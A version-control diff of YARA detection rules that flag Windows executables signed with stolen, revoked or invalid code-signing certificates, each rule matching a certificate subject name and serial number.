-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L263-L274"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6873-L6884"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68a91e0e042606d49a5c83c972b0a6bf387c9d7d20c2df132edec717ab4603a0"
+		logic_hash = "d88c9ac03a4b3803b85c5ee30ad127aca43cbfc33d754bc42c15593f7294b1bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8bfc13bf01e98e5b38f8f648f0f843b63af03f55"
+		thumbprint = "5617114bc2a584532eba1dd9eb9d23108d1f9ea7"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ESTELLA, OOO" and pe.signatures [ i ] . serial == "73:6d:cf:d3:09:ea:4c:3b:ea:23:28:74:73:ff:e0:71" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "a3:cb:8e:96:42:44:76:89:69:b8:37:ca:99:81:de:68" or pe.signatures [ i ] . serial == "00:a3:cb:8e:96:42:44:76:89:69:b8:37:ca:99:81:de:68" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_09C89De6F64A7Fdf657E69353C5Fdd44 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Bd96F0B87Edca41E777507015B3B2775 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "613c4253-8a53-5faa-8376-10c9a35805cf"
+		id = "5ef0b542-01de-53ee-9a52-0a05bccccd22"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L276-L287"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6886-L6900"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7fcb517a4160226cf89c13b5b27310d1e8a02d3f164a338a8d2901ef604f1d8a"
+		logic_hash = "a9906821de34bf6a20bfe1a4be81563a22b110bde68fbe36b491955c23d2dcc6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7ad763dfdaabc1c5a8d1be582ec17d4cdcbd1aeb"
+		thumbprint = "abfa72d4a78a9e63f97c90bcccb8f46f3c14ac52"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXON RENTAL SP Z O O" and pe.signatures [ i ] . serial == "09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ООО \"СМ\"" and ( pe.signatures [ i ] . serial == "bd:96:f0:b8:7e:dc:a4:1e:77:75:07:01:5b:3b:27:75" or pe.signatures [ i ] . serial == "00:bd:96:f0:b8:7e:dc:a4:1e:77:75:07:01:5b:3b:27:75" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_03B630F9645531F8868Dae8Ac0F8Cfe6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E41537B8Dd65670D6Eb01954Becacf1E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ca5203b8-3029-5914-b611-1717aefc7ccf"
+		id = "80ac0d4e-5865-562a-a4a1-fa02b6859bdb"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L289-L300"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6902-L6916"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0c388ee7cfc2f35d5e020520d0c5a04b872d5deff63fc551308168e60122f7fc"
+		logic_hash = "94b7feb2d1ed8a7004599ac2018746bf43529f7cf7c4776fbdf21282013935c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ab027825daf46c5e686e4d9bc9c55a5d8c5e957d"
+		thumbprint = "150ff604efa1e4868ea47c5d48244e57fa4b9196"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Geksan LLC" and pe.signatures [ i ] . serial == "03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marketing Concept s.r.o." and ( pe.signatures [ i ] . serial == "e4:15:37:b8:dd:65:67:0d:6e:b0:19:54:be:ca:cf:1e" or pe.signatures [ i ] . serial == "00:e4:15:37:b8:dd:65:67:0d:6e:b0:19:54:be:ca:cf:1e" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_020Bc03538Fbdc792F39D99A24A81B97 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_06808C5934Da036A1297A936D72E93D4 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d5fd84b4-cccf-569d-96ea-26d9d21c6adf"
+		id = "c75ae0da-e8b9-581f-bfde-f23b3b3f9d22"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L302-L313"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6918-L6929"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "154d7d814ff0b1c2d85557211dd68d0bd82e9953a9912ac3c26475a1316b0cb3"
+		logic_hash = "45840d354dcea86c38effc86b3b6f92540f32eab78286d51ff7f472618accb8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0ab2629e4e721a65ad35758d1455c1202aa643d3"
+		thumbprint = "efb70718bc00393a01694f255a28e30e9d2142a4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLOBAL PARK HORIZON SP Z O O" and pe.signatures [ i ] . serial == "02:0b:c0:35:38:fb:dc:79:2f:39:d9:9a:24:a8:1b:97" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rhaon Entertainment Inc" and pe.signatures [ i ] . serial == "06:80:8c:59:34:da:03:6a:12:97:a9:36:d7:2e:93:d4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4E8D4Fc7D9F38Aca1169Fbf8Ef2Aaf50 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_97D50C7E3Ab45B9A441A37D870484C10 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "03a23987-bbec-5072-bea4-56773bdc7d53"
+		id = "54c391df-ea76-5944-aae6-63f44ec557e5"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L315-L326"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6931-L6942"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2b440d21183745ac89de56f5ca22cf3f01be3212e20ce80fa67a45adbb6b16fe"
+		logic_hash = "2f535f66a4aabffff48f167ffcabcb366398e358eaafa2b3d67ee4c7ad19eb66"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7239764d40118fc1574a0af77a34e369971ddf6d"
+		thumbprint = "2e47ceb6593c9fdbd367da8b765090e48f630b33"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "INFINITE PROGRAMMING LIMITED" and pe.signatures [ i ] . serial == "4e:8d:4f:c7:d9:f3:8a:ca:11:69:fb:f8:ef:2a:af:50" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHENZHEN MINIWAN TECHNOLOGY CO. LTD." and pe.signatures [ i ] . serial == "97:d5:0c:7e:3a:b4:5b:9a:44:1a:37:d8:70:48:4c:10" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_09830675Eb483E265C3153F0A77C3De9 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0B2B192657B37632518B08A06E201381 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3370886e-6866-598b-b3bf-29c7f2537425"
+		id = "917d2d66-f4b4-59b1-aeed-3b10c337d4b8"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L328-L339"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6944-L6955"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0a504ed2a2816602ac378a700567909812650f409626a7b2c1e25cf7f8cb51c"
+		logic_hash = "361005555e5d4b51c4538617c99fe668fca61ccc0c0847611e1423f69194999c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1bb5503a2e1043616b915c4fce156c34304505d6"
+		thumbprint = "ea017224c3b209abf53941cc4110e93af7ecc7b1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "James LTH d.o.o." and pe.signatures [ i ] . serial == "09:83:06:75:eb:48:3e:26:5c:31:53:f0:a7:7c:3d:e9" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Atomic Protocol Systems" and pe.signatures [ i ] . serial == "0b:2b:19:26:57:b3:76:32:51:8b:08:a0:6e:20:13:81" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_351Fe2Efdc0Ac56A0C822Cf8 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00945Aaac27E7D6D810C0A542Bedd562A4 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dcd82e7a-f235-5ff6-805b-0da7e0c0e385"
+		id = "5698130c-0696-5474-8b86-b6ba290d2822"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L341-L352"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6957-L6972"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a661adcd9366da7eab0aa8059bbe6236022f7513996603eb06c43a0b38ff4b85"
+		logic_hash = "292657717cb42835324b6ff42d563bca47e042e82afef24b5d666b16979b8103"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4230bca4b7e4744058a7bb6e355346ff0bbeb26f"
+		thumbprint = "de7794505df4aeb1253500617e812f462592e163"
+		hash1 = "df3dabd031184b67bab7043baaae17061c21939d725e751c0a6f6b7867d0cf34"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DYNAMX BUSINESS GROUP LTD." and ( pe.signatures [ i ] . serial == "94:5a:aa:c2:7e:7d:6d:81:0c:0a:54:2b:ed:d5:62:a4" or pe.signatures [ i ] . serial == "00:94:5a:aa:c2:7e:7d:6d:81:0c:0a:54:2b:ed:d5:62:a4" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_07Bb6A9D1C642C5973C16D5353B17Ca4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6D450Cc59Acdb4B7 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a29590bb-d8f9-5842-81bd-f9a9f7cea642"
+		id = "845e3f48-5660-525e-bd18-5953c64322f1"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L354-L365"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6974-L6985"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "faecdcd78bc60f730bfe5a049fd0bd1309b44d185c0cbc81dfc326a162d5fcb2"
+		logic_hash = "8328159dce3586c26b777f92d7a87e0660520cf08d122505d34ed427bdd7ff6f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9de562e98a5928866ffc581b794edfbc249a2a07"
+		thumbprint = "bd3ac678cabb6465854880dd06b7b6cd231def89"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADAS d.o.o." and pe.signatures [ i ] . serial == "07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CancellationTokenSource" and pe.signatures [ i ] . serial == "6d:45:0c:c5:9a:cd:b4:b7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_66390Fc17786D4A342F0Ee89996D6522 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e8dc8963-29c1-5306-bd7d-80ad9e1334d9"
+		id = "202e4270-9b49-5516-8188-a64bd528a9c4"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L367-L378"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6987-L6998"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c433b63f9c875a564f424ecc8e9239701ce8be78cd0046c1eefca8cf732abca3"
+		logic_hash = "a38d09beee8ddaa6e8273e04fe3c5cc9ff9a4e55344e2b9191bb3e5928e9e79b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "149b7bbe88d4754f2900c88516ce97be605553ff"
+		thumbprint = "80e8620ff16598cc1e157a2b7df17d528b03b6e5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MUSTER PLUS SP Z O O" and pe.signatures [ i ] . serial == "04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logitech Z-" and pe.signatures [ i ] . serial == "66:39:0f:c1:77:86:d4:a3:42:f0:ee:89:99:6d:65:22" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0C14B611A44A1Bae0E8C7581651845B6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00D1737E5A94D2Aff121163Df177Ed7Cf7 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a6ebe304-e896-5cb3-8a49-ebffe0525601"
+		id = "92ba22ba-9610-5b9b-9075-1da84fb148c1"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L380-L391"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7000-L7015"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dae6318cf6f8e33e11af5c4b06379f8ef2744e784bb793c78f782b6a6286b84b"
+		logic_hash = "7889e42ca0bc6c4aad0c7cf90459958e9d256b984fae719bd418fc17120cb4a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c3288c7fbb01214c8f2dc3172c3f5c48f300cb8b"
+		thumbprint = "ed2e4f72e8cb9b008a28b31de440f024381e4c8d"
+		hash1 = "66dfb7c408d734edc2967d50244babae27e4268ea93aa0daa5e6bbace607024c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEEDCODE SP Z O O" and pe.signatures [ i ] . serial == "0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BedstSammen ApS" and ( pe.signatures [ i ] . serial == "d1:73:7e:5a:94:d2:af:f1:21:16:3d:f1:77:ed:7c:f7" or pe.signatures [ i ] . serial == "00:d1:73:7e:5a:94:d2:af:f1:21:16:3d:f1:77:ed:7c:f7" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0B1926A5E8Ae50A0Efa504F005F93869 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5Aa94583A95D42F1 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "905a4b5c-3255-5f53-be54-429038378ee0"
+		id = "a77e58c7-c613-5416-9bcd-336c036d99bd"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L393-L404"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7017-L7028"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "78d507f76d44ed982d12c293604d5c4fed14316cbc18473b7131bb89997bad28"
+		logic_hash = "174ce032fd87028e34843417d5a4695d6d6e2eb444095e005588f1acf291cdf8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2052ed19dcb0e3dfff71d217be27fc5a11c0f0d4"
+		thumbprint = "0b27715d7c78368bca3ac0bb829a7ceb19b3b5c3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nordkod LLC" and pe.signatures [ i ] . serial == "0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UInt32" and pe.signatures [ i ] . serial == "5a:a9:45:83:a9:5d:42:f1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Bab6A2Aa84B495D9E554A4C42C0126D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6Ce7A0C62F27Fa98F78853E1Ad11173F : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "be364465-0cab-59cd-82a2-b7b16f260f34"
+		id = "dd6ba685-deac-5ba0-8268-2ff17f3efc5a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L406-L417"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7030-L7041"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9ecdf1107cba0767ac3fa52c7dd65a13015e4fd735da70b6f1e6dbcfe2f7526"
+		logic_hash = "48692213d57293d28d0eb146d24036fa7e7357e55df07330d596a51a0665f063"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "230614366ddac05c9120a852058c24fa89972535"
+		thumbprint = "638dc7cd59f1d634c19e4fc2c41b38ae08a1d2e5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOSOV SP Z O O" and pe.signatures [ i ] . serial == "0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" )
+		( uint16( 0 ) == 0x5a4d or uint32( 0 ) == 0xe011cfd0 ) and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D&K ENGINEERING" and pe.signatures [ i ] . serial == "6c:e7:a0:c6:2f:27:fa:98:f7:88:53:e1:ad:11:17:3f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_066226Cf6A4D8Ae1100961A0C5404Ff9 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_670C3494206B9F0C18714Fdcffaaa42F : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "75db8056-a5da-5db4-a837-84c5cc05f0fc"
+		id = "cbe10923-794e-50f0-bcc7-026ca2235836"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L419-L430"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7043-L7054"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b7fa450d143de99650d0364e461178ad4e0b147b19dae53b59928b2a17c9b6d"
+		logic_hash = "5215f3e877ac4b37d33a29f9d2e92567db02f41f5fa1592d2de199ee06b43885"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8c762918a58ebccb1713720c405088743c0d6d20"
+		thumbprint = "59612473a9e23dc770f3a33b1ef83c02e3cfd4b6"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO MEP" and pe.signatures [ i ] . serial == "06:62:26:cf:6a:4d:8a:e1:10:09:61:a0:c5:40:4f:f9" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures [ i ] . serial == "67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0E96837Dbe5F4548547203919B96Ac27 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5F11C47D3F8C468E5D38279De98078Ce : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "83258afe-66e0-56d1-8361-125a1142ffe4"
+		id = "d7ec5ceb-df6d-518c-977d-84ab2a40f6ed"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L432-L443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7056-L7067"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2eedcc1d782df3c078c20a275680c2ff724e5b7675890af1335ff22d6138ab25"
+		logic_hash = "82db6d0b96303be79aa9a0980a4ce491a1216adbba65443e8e59c5cf69a4a1e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d6c6a0a4a57af645c9cad90b57c696ad9ad9fcf9"
+		thumbprint = "29bbee51837dbc00c8e949ff2c0226d4bbb3722c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN CORP PTY LTD" and pe.signatures [ i ] . serial == "0e:96:83:7d:be:5f:45:48:54:72:03:91:9b:96:ac:27" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Atera Networks LTD." and pe.signatures [ i ] . serial == "5f:11:c4:7d:3f:8c:46:8e:5d:38:27:9d:e9:80:78:ce" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5B320A2F46C99C1Ba1357Bee : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Bdb99D5Ecf8271D48E35F1039C2160Ef : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "376aab03-0bc7-5993-bbbd-9bf5b742d29d"
+		id = "a87a3295-fbdb-5501-97a1-7cb23009f925"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L445-L456"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7069-L7083"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0a515aa69b5de58cf7d1a496f95038e090cefe511803e7a29332b411a20d19f"
+		logic_hash = "3a7fd1705d440306e7643167f46b0735bedab291e714cd01068be321f489e3f3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5ae8bd51ffa8e82f8f3d8297c4f9caf5e30f425a"
+		thumbprint = "331f96a1a187723eaa5b72c9d0115c1c57f08b66"
